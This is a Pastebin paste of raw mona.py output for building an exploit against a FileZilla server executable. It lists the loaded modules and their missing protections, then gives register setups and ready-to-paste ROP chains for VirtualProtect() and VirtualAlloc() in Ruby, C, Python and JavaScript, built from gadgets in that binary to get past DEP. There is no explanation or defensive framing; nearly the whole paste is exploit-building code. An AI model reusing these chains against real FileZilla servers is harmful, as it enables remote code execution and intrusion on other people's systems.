API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 24th, 2014
171
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.19 KB | None | 0 0
raw download clone embed print report
  1. ----------------------------------------------------------------------------------------------------------------------------------
  2. Module info :
  3. ----------------------------------------------------------------------------------------------------------------------------------
  4. Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
  5. ----------------------------------------------------------------------------------------------------------------------------------
  6. 0x756c0000 | 0x757dd000 | 0x0011d000 | True | True | True | True | True | 6.1.7600.16385 [CRYPT32.dll] (C:\Windows\system32\CRYPT32.dll)
  7. 0x75630000 | 0x7563c000 | 0x0000c000 | True | True | True | True | True | 6.1.7601.17514 [MSASN1.dll] (C:\Windows\system32\MSASN1.dll)
  8. 0x74ff0000 | 0x74ff6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wship6.dll] (C:\Windows\System32\wship6.dll)
  9. 0x772c0000 | 0x77394000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)
  10. 0x758c0000 | 0x7596c000 | 0x000ac000 | True | True | True | True | True | 7.0.7600.16385 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)
  11. 0x77470000 | 0x775ac000 | 0x0013c000 | True | True | True | True | True | 6.1.7600.16385 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
  12. 0x76200000 | 0x76219000 | 0x00019000 | True | True | True | True | True | 6.1.7600.16385 [sechost.dll] (C:\Windows\SYSTEM32\sechost.dll)
  13. 0x74ad0000 | 0x74ad5000 | 0x00005000 | True | True | True | True | True | 6.1.7600.16385 [wshtcpip.dll] (C:\Windows\System32\wshtcpip.dll)
  14. 0x775b0000 | 0x775ba000 | 0x0000a000 | True | True | True | True | True | 6.1.7600.16385 [LPK.dll] (C:\Windows\system32\LPK.dll)
  15. 0x75c80000 | 0x75d1d000 | 0x0009d000 | True | True | True | True | True | 1.0626.7601.17514 [USP10.dll] (C:\Windows\system32\USP10.dll)
  16. 0x773a0000 | 0x77469000 | 0x000c9000 | True | True | True | True | True | 6.1.7601.17514 [USER32.dll] (C:\Windows\system32\USER32.dll)
  17. 0x75e00000 | 0x75ea1000 | 0x000a1000 | True | True | True | True | True | 6.1.7600.16385 [RPCRT4.dll] (C:\Windows\system32\RPCRT4.dll)
  18. 0x761e0000 | 0x761ff000 | 0x0001f000 | True | True | True | True | True | 6.1.7601.17514 [IMM32.DLL] (C:\Windows\system32\IMM32.DLL)
  19. 0x71c60000 | 0x71c66000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wls0wndh.dll] (C:\Windows\system32\wls0wndh.dll)
  20. 0x775c0000 | 0x775c6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [NSI.dll] (C:\Windows\system32\NSI.dll)
  21. 0x771f0000 | 0x772bc000 | 0x000cc000 | True | True | True | True | True | 6.1.7600.16385 [MSCTF.dll] (C:\Windows\system32\MSCTF.dll)
  22. 0x75670000 | 0x756ba000 | 0x0004a000 | True | True | True | True | True | 6.1.7600.16385 [KERNELBASE.dll] (C:\Windows\system32\KERNELBASE.dll)
  23. 0x74bb0000 | 0x74bb9000 | 0x00009000 | True | True | True | True | True | 6.1.7600.16385 [VERSION.dll] (C:\Windows\system32\VERSION.dll)
  24. 0x75000000 | 0x7503c000 | 0x0003c000 | True | True | True | True | True | 6.1.7600.16385 [mswsock.dll] (C:\Windows\system32\mswsock.dll)
  25. 0x770a0000 | 0x770ee000 | 0x0004e000 | True | True | True | True | True | 6.1.7601.17514 [GDI32.dll] (C:\Windows\system32\GDI32.dll)
  26. 0x10000000 | 0x100a1000 | 0x000a1000 | False | False | False | False | False | 0.9.40.0 [FileZilla server_fixed.exe] (C:\Users\win7\Desktop\ftp\FileZilla server_fixed.exe)
  27. 0x77600000 | 0x776a0000 | 0x000a0000 | True | True | True | True | True | 6.1.7600.16385 [ADVAPI32.dll] (C:\Windows\system32\ADVAPI32.dll)
  28. 0x75c40000 | 0x75c75000 | 0x00035000 | True | True | True | True | True | 6.1.7600.16385 [WS2_32.dll] (C:\Windows\system32\WS2_32.dll)
  29. ----------------------------------------------------------------------------------------------------------------------------------
  30.  
  31. ################################################################################
  32.  
  33. Register setup for VirtualProtect() :
  34. --------------------------------------------
  35. EAX = NOP (0x90909090)
  36. ECX = lpOldProtect (ptr to W address)
  37. EDX = NewProtect (0x40)
  38. EBX = dwSize
  39. ESP = lPAddress (automatic)
  40. EBP = ReturnTo (ptr to jmp esp)
  41. ESI = ptr to VirtualProtect()
  42. EDI = ROP NOP (RETN)
  43. --- alternative chain ---
  44. EAX = tr to &VirtualProtect()
  45. ECX = lpOldProtect (ptr to W address)
  46. EDX = NewProtect (0x40)
  47. EBX = dwSize
  48. ESP = lPAddress (automatic)
  49. EBP = POP (skip 4 bytes)
  50. ESI = ptr to JMP [EAX]
  51. EDI = ROP NOP (RETN)
  52. + place ptr to "jmp esp" on stack, below PUSHAD
  53. --------------------------------------------
  54.  
  55.  
  56. ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
  57. ----------------------------------------------------------
  58.  
  59. *** [ Ruby ] ***
  60.  
  61. def create_rop_chain()
  62.  
  63. # rop chain generated with mona.py - www.corelan.be
  64. rop_gadgets =
  65. [
  66. 0x00 00 00 00, # [-] Unable to find API pointer -> eax
  67. 0x10 07 89 40, # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
  68. 0x41 41 41 41, # Filler (compensate)
  69. 0x41 41 41 41, # Filler (compensate)
  70. 0x10 02 f7 f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  71. 0x10 06 31 96, # POP EBP # RETN [FileZilla server_fixed.exe]
  72. 0x10 02 35 1a, # & push esp # ret [FileZilla server_fixed.exe]
  73. 0x10 02 2a 13, # POP EBX # RETN [FileZilla server_fixed.exe]
  74. 0x00 00 02 01, # 0x00000201-> ebx
  75. 0x10 05 57 be, # POP EBX # RETN [FileZilla server_fixed.exe]
  76. 0x00 00 00 40, # 0x00000040-> edx
  77. 0x10 07 c0 5c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  78. 0x10 07 8e 3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  79. 0x41 41 41 41, # Filler (compensate)
  80. 0x10 07 e8 d3, # POP ECX # RETN [FileZilla server_fixed.exe]
  81. 0x41 41 41 41, # Filler (RETN offset compensation)
  82. 0x41 41 41 41, # Filler (RETN offset compensation)
  83. 0x41 41 41 41, # Filler (RETN offset compensation)
  84. 0x41 41 41 41, # Filler (RETN offset compensation)
  85. 0x10 09 a0 62, # &Writable location [FileZilla server_fixed.exe]
  86. 0x10 05 2a 65, # POP EDI # RETN [FileZilla server_fixed.exe]
  87. 0x10 06 88 84, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  88. 0x10 02 ae af, # POP EAX # RETN [FileZilla server_fixed.exe]
  89. 0x90 90 90 90, # nop
  90. 0x10 04 e7 42, # PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
  91. ].flatten.pack("V*")
  92.  
  93. return rop_gadgets
  94.  
  95. end
  96.  
  97.  
  98. # Call the ROP chain generator inside the 'exploit' function :
  99.  
  100.  
  101. rop_chain = create_rop_chain()
  102.  
  103.  
  104.  
  105. *** [ C ] ***
  106.  
  107. #define CREATE_ROP_CHAIN(name, ...) \
  108. int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
  109. unsigned int name[name##_length / sizeof(unsigned int)]; \
  110. create_rop_chain(name, ##__VA_ARGS__);
  111.  
  112. int create_rop_chain(unsigned int *buf, unsigned int )
  113. {
  114. // rop chain generated with mona.py - www.corelan.be
  115. unsigned int rop_gadgets[] = {
  116. 0x00000000, // [-] Unable to find API pointer -> eax
  117. 0x10078940, // MOV EAX,DWORD PTR DS:[EAX] // POP ESI // POP EBP // RETN [FileZilla server_fixed.exe]
  118. 0x41414141, // Filler (compensate)
  119. 0x41414141, // Filler (compensate)
  120. 0x1002f7f0, // PUSH EAX // ADD AL,8B // DEC ESI // PUSHAD // MOV DWORD PTR DS:[EAX+8],ECX // MOV EDX,DWORD PTR DS:[ESI+64] // ADD ESP,4 // MOV DWORD PTR DS:[EAX+C],EDX // POP ESI // RETN [FileZilla server_fixed.exe]
  121. 0x10063196, // POP EBP // RETN [FileZilla server_fixed.exe]
  122. 0x1002351a, // & push esp // ret [FileZilla server_fixed.exe]
  123. 0x10022a13, // POP EBX // RETN [FileZilla server_fixed.exe]
  124. 0x00000201, // 0x00000201-> ebx
  125. 0x100557be, // POP EBX // RETN [FileZilla server_fixed.exe]
  126. 0x00000040, // 0x00000040-> edx
  127. 0x1007c05c, // XOR EDX,EDX // RETN [FileZilla server_fixed.exe]
  128. 0x10078e3e, // ADD EDX,EBX // POP EBX // RETN 0x10 [FileZilla server_fixed.exe]
  129. 0x41414141, // Filler (compensate)
  130. 0x1007e8d3, // POP ECX // RETN [FileZilla server_fixed.exe]
  131. 0x41414141, // Filler (RETN offset compensation)
  132. 0x41414141, // Filler (RETN offset compensation)
  133. 0x41414141, // Filler (RETN offset compensation)
  134. 0x41414141, // Filler (RETN offset compensation)
  135. 0x1009a062, // &Writable location [FileZilla server_fixed.exe]
  136. 0x10052a65, // POP EDI // RETN [FileZilla server_fixed.exe]
  137. 0x10068884, // RETN (ROP NOP) [FileZilla server_fixed.exe]
  138. 0x1002aeaf, // POP EAX // RETN [FileZilla server_fixed.exe]
  139. 0x90909090, // nop
  140. 0x1004e742, // PUSHAD // RETN 0x04 [FileZilla server_fixed.exe]
  141. };
  142. if(buf != NULL) {
  143. memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
  144. };
  145. return sizeof(rop_gadgets);
  146. }
  147.  
  148. // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  149. CREATE_ROP_CHAIN(rop_chain, );
  150. // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  151. // unsigned int rop_chain[256];
  152. // int rop_chain_length = create_rop_chain(rop_chain, );
  153.  
  154. *** [ Python ] ***
  155.  
  156. def create_rop_chain():
  157.  
  158. # rop chain generated with mona.py - www.corelan.be
  159. rop_gadgets = [
  160. 0x00000000, # [-] Unable to find API pointer -> eax
  161. 0x10078940, # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
  162. 0x41414141, # Filler (compensate)
  163. 0x41414141, # Filler (compensate)
  164. 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  165. 0x10063196, # POP EBP # RETN [FileZilla server_fixed.exe]
  166. 0x1002351a, # & push esp # ret [FileZilla server_fixed.exe]
  167. 0x10022a13, # POP EBX # RETN [FileZilla server_fixed.exe]
  168. 0x00000201, # 0x00000201-> ebx
  169. 0x100557be, # POP EBX # RETN [FileZilla server_fixed.exe]
  170. 0x00000040, # 0x00000040-> edx
  171. 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  172. 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  173. 0x41414141, # Filler (compensate)
  174. 0x1007e8d3, # POP ECX # RETN [FileZilla server_fixed.exe]
  175. 0x41414141, # Filler (RETN offset compensation)
  176. 0x41414141, # Filler (RETN offset compensation)
  177. 0x41414141, # Filler (RETN offset compensation)
  178. 0x41414141, # Filler (RETN offset compensation)
  179. 0x1009a062, # &Writable location [FileZilla server_fixed.exe]
  180. 0x10052a65, # POP EDI # RETN [FileZilla server_fixed.exe]
  181. 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  182. 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
  183. 0x90909090, # nop
  184. 0x1004e742, # PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
  185. ]
  186. return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
  187.  
  188. rop_chain = create_rop_chain()
  189.  
  190.  
  191.  
  192. *** [ JavaScript ] ***
  193.  
  194. //rop chain generated with mona.py - www.corelan.be
  195. rop_gadgets = unescape(
  196. "%u0000%u0000" + // 0x00000000 : ,# [-] Unable to find API pointer -> eax
  197. "%u8940%u1007" + // 0x10078940 : ,# MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
  198. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  199. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  200. "%uf7f0%u1002" + // 0x1002f7f0 : ,# PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  201. "%u3196%u1006" + // 0x10063196 : ,# POP EBP # RETN [FileZilla server_fixed.exe]
  202. "%u351a%u1002" + // 0x1002351a : ,# & push esp # ret[FileZilla server_fixed.exe]
  203. "%u2a13%u1002" + // 0x10022a13 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  204. "%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
  205. "%u57be%u1005" + // 0x100557be : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  206. "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx
  207. "%uc05c%u1007" + // 0x1007c05c : ,# XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  208. "%u8e3e%u1007" + // 0x10078e3e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  209. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  210. "%ue8d3%u1007" + // 0x1007e8d3 : ,# POP ECX # RETN [FileZilla server_fixed.exe]
  211. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  212. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  213. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  214. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  215. "%ua062%u1009" + // 0x1009a062 : ,# &Writable location [FileZilla server_fixed.exe]
  216. "%u2a65%u1005" + // 0x10052a65 : ,# POP EDI # RETN [FileZilla server_fixed.exe]
  217. "%u8884%u1006" + // 0x10068884 : ,# RETN (ROP NOP) [FileZilla server_fixed.exe]
  218. "%uaeaf%u1002" + // 0x1002aeaf : ,# POP EAX # RETN [FileZilla server_fixed.exe]
  219. "%u9090%u9090" + // 0x90909090 : ,# nop
  220. "%ue742%u1004" + // 0x1004e742 : ,# PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
  221. ""); // :
  222.  
  223.  
  224. --------------------------------------------------------------------------------------------------
  225.  
  226.  
  227. ################################################################################
  228.  
  229. Register setup for VirtualAlloc() :
  230. --------------------------------------------
  231. EAX = NOP (0x90909090)
  232. ECX = flProtect (0x40)
  233. EDX = flAllocationType (0x1000)
  234. EBX = dwSize
  235. ESP = lpAddress (automatic)
  236. EBP = ReturnTo (ptr to jmp esp)
  237. ESI = ptr to VirtualAlloc()
  238. EDI = ROP NOP (RETN)
  239. --- alternative chain ---
  240. EAX = ptr to &VirtualAlloc()
  241. ECX = flProtect (0x40)
  242. EDX = flAllocationType (0x1000)
  243. EBX = dwSize
  244. ESP = lpAddress (automatic)
  245. EBP = POP (skip 4 bytes)
  246. ESI = ptr to JMP [EAX]
  247. EDI = ROP NOP (RETN)
  248. + place ptr to "jmp esp" on stack, below PUSHAD
  249. --------------------------------------------
  250.  
  251.  
  252. ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
  253. --------------------------------------------------------
  254.  
  255. *** [ Ruby ] ***
  256.  
  257. def create_rop_chain()
  258.  
  259. # rop chain generated with mona.py - www.corelan.be
  260. rop_gadgets =
  261. [
  262. 0x1004388a, # POP ESI # RETN [FileZilla server_fixed.exe]
  263. 0x10082148, # ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  264. 0x1000c99f, # MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
  265. 0x41414141, # Filler (compensate)
  266. 0x41414141, # Filler (compensate)
  267. 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  268. 0x1005e2e1, # POP EBP # RETN [FileZilla server_fixed.exe]
  269. 0x10007dba, # & push esp # ret [FileZilla server_fixed.exe]
  270. 0x100681a5, # POP EBX # RETN [FileZilla server_fixed.exe]
  271. 0x00000001, # 0x00000001-> ebx
  272. 0x10055082, # POP EBX # RETN [FileZilla server_fixed.exe]
  273. 0x00001000, # 0x00001000-> edx
  274. 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  275. 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  276. 0x41414141, # Filler (compensate)
  277. 0x10080d44, # POP ECX # RETN [FileZilla server_fixed.exe]
  278. 0x41414141, # Filler (RETN offset compensation)
  279. 0x41414141, # Filler (RETN offset compensation)
  280. 0x41414141, # Filler (RETN offset compensation)
  281. 0x41414141, # Filler (RETN offset compensation)
  282. 0x00000040, # 0x00000040-> ecx
  283. 0x10066f18, # POP EDI # RETN [FileZilla server_fixed.exe]
  284. 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  285. 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
  286. 0x90909090, # nop
  287. 0x10014f48, # PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
  288. ].flatten.pack("V*")
  289.  
  290. return rop_gadgets
  291.  
  292. end
  293.  
  294.  
  295. # Call the ROP chain generator inside the 'exploit' function :
  296.  
  297.  
  298. rop_chain = create_rop_chain()
  299.  
  300.  
  301.  
  302. *** [ C ] ***
  303.  
  304. #define CREATE_ROP_CHAIN(name, ...) \
  305. int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
  306. unsigned int name[name##_length / sizeof(unsigned int)]; \
  307. create_rop_chain(name, ##__VA_ARGS__);
  308.  
  309. int create_rop_chain(unsigned int *buf, unsigned int )
  310. {
  311. // rop chain generated with mona.py - www.corelan.be
  312. unsigned int rop_gadgets[] = {
  313. 0x1004388a, // POP ESI // RETN [FileZilla server_fixed.exe]
  314. 0x10082148, // ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  315. 0x1000c99f, // MOV EAX,DWORD PTR DS:[ESI] // POP ESI // POP ECX // RETN [FileZilla server_fixed.exe]
  316. 0x41414141, // Filler (compensate)
  317. 0x41414141, // Filler (compensate)
  318. 0x1002f7f0, // PUSH EAX // ADD AL,8B // DEC ESI // PUSHAD // MOV DWORD PTR DS:[EAX+8],ECX // MOV EDX,DWORD PTR DS:[ESI+64] // ADD ESP,4 // MOV DWORD PTR DS:[EAX+C],EDX // POP ESI // RETN [FileZilla server_fixed.exe]
  319. 0x1005e2e1, // POP EBP // RETN [FileZilla server_fixed.exe]
  320. 0x10007dba, // & push esp // ret [FileZilla server_fixed.exe]
  321. 0x100681a5, // POP EBX // RETN [FileZilla server_fixed.exe]
  322. 0x00000001, // 0x00000001-> ebx
  323. 0x10055082, // POP EBX // RETN [FileZilla server_fixed.exe]
  324. 0x00001000, // 0x00001000-> edx
  325. 0x1007c05c, // XOR EDX,EDX // RETN [FileZilla server_fixed.exe]
  326. 0x10078e3e, // ADD EDX,EBX // POP EBX // RETN 0x10 [FileZilla server_fixed.exe]
  327. 0x41414141, // Filler (compensate)
  328. 0x10080d44, // POP ECX // RETN [FileZilla server_fixed.exe]
  329. 0x41414141, // Filler (RETN offset compensation)
  330. 0x41414141, // Filler (RETN offset compensation)
  331. 0x41414141, // Filler (RETN offset compensation)
  332. 0x41414141, // Filler (RETN offset compensation)
  333. 0x00000040, // 0x00000040-> ecx
  334. 0x10066f18, // POP EDI // RETN [FileZilla server_fixed.exe]
  335. 0x10068884, // RETN (ROP NOP) [FileZilla server_fixed.exe]
  336. 0x1002aeaf, // POP EAX // RETN [FileZilla server_fixed.exe]
  337. 0x90909090, // nop
  338. 0x10014f48, // PUSHAD // RETN 0x0C [FileZilla server_fixed.exe]
  339. };
  340. if(buf != NULL) {
  341. memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
  342. };
  343. return sizeof(rop_gadgets);
  344. }
  345.  
  346. // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  347. CREATE_ROP_CHAIN(rop_chain, );
  348. // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  349. // unsigned int rop_chain[256];
  350. // int rop_chain_length = create_rop_chain(rop_chain, );
  351.  
  352. *** [ Python ] ***
  353.  
  354. def create_rop_chain():
  355.  
  356. # rop chain generated with mona.py - www.corelan.be
  357. rop_gadgets = [
  358. 0x1004388a, # POP ESI # RETN [FileZilla server_fixed.exe]
  359. 0x10082148, # ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  360. 0x1000c99f, # MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
  361. 0x41414141, # Filler (compensate)
  362. 0x41414141, # Filler (compensate)
  363. 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  364. 0x1005e2e1, # POP EBP # RETN [FileZilla server_fixed.exe]
  365. 0x10007dba, # & push esp # ret [FileZilla server_fixed.exe]
  366. 0x100681a5, # POP EBX # RETN [FileZilla server_fixed.exe]
  367. 0x00000001, # 0x00000001-> ebx
  368. 0x10055082, # POP EBX # RETN [FileZilla server_fixed.exe]
  369. 0x00001000, # 0x00001000-> edx
  370. 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  371. 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  372. 0x41414141, # Filler (compensate)
  373. 0x10080d44, # POP ECX # RETN [FileZilla server_fixed.exe]
  374. 0x41414141, # Filler (RETN offset compensation)
  375. 0x41414141, # Filler (RETN offset compensation)
  376. 0x41414141, # Filler (RETN offset compensation)
  377. 0x41414141, # Filler (RETN offset compensation)
  378. 0x00000040, # 0x00000040-> ecx
  379. 0x10066f18, # POP EDI # RETN [FileZilla server_fixed.exe]
  380. 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  381. 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
  382. 0x90909090, # nop
  383. 0x10014f48, # PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
  384. ]
  385. return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
  386.  
  387. rop_chain = create_rop_chain()
  388.  
  389.  
  390.  
  391. *** [ JavaScript ] ***
  392.  
  393. //rop chain generated with mona.py - www.corelan.be
  394. rop_gadgets = unescape(
  395. "%u388a%u1004" + // 0x1004388a : ,# POP ESI # RETN [FileZilla server_fixed.exe]
  396. "%u2148%u1008" + // 0x10082148 : ,# ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  397. "%uc99f%u1000" + // 0x1000c99f : ,# MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
  398. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  399. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  400. "%uf7f0%u1002" + // 0x1002f7f0 : ,# PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  401. "%ue2e1%u1005" + // 0x1005e2e1 : ,# POP EBP # RETN [FileZilla server_fixed.exe]
  402. "%u7dba%u1000" + // 0x10007dba : ,# & push esp # ret[FileZilla server_fixed.exe]
  403. "%u81a5%u1006" + // 0x100681a5 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  404. "%u0001%u0000" + // 0x00000001 : ,# 0x00000001-> ebx
  405. "%u5082%u1005" + // 0x10055082 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  406. "%u1000%u0000" + // 0x00001000 : ,# 0x00001000-> edx
  407. "%uc05c%u1007" + // 0x1007c05c : ,# XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  408. "%u8e3e%u1007" + // 0x10078e3e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  409. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  410. "%u0d44%u1008" + // 0x10080d44 : ,# POP ECX # RETN [FileZilla server_fixed.exe]
  411. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  412. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  413. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  414. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  415. "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> ecx
  416. "%u6f18%u1006" + // 0x10066f18 : ,# POP EDI # RETN [FileZilla server_fixed.exe]
  417. "%u8884%u1006" + // 0x10068884 : ,# RETN (ROP NOP) [FileZilla server_fixed.exe]
  418. "%uaeaf%u1002" + // 0x1002aeaf : ,# POP EAX # RETN [FileZilla server_fixed.exe]
  419. "%u9090%u9090" + // 0x90909090 : ,# nop
  420. "%u4f48%u1001" + // 0x10014f48 : ,# PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
  421. ""); // :
  422.  
  423.  
  424. --------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!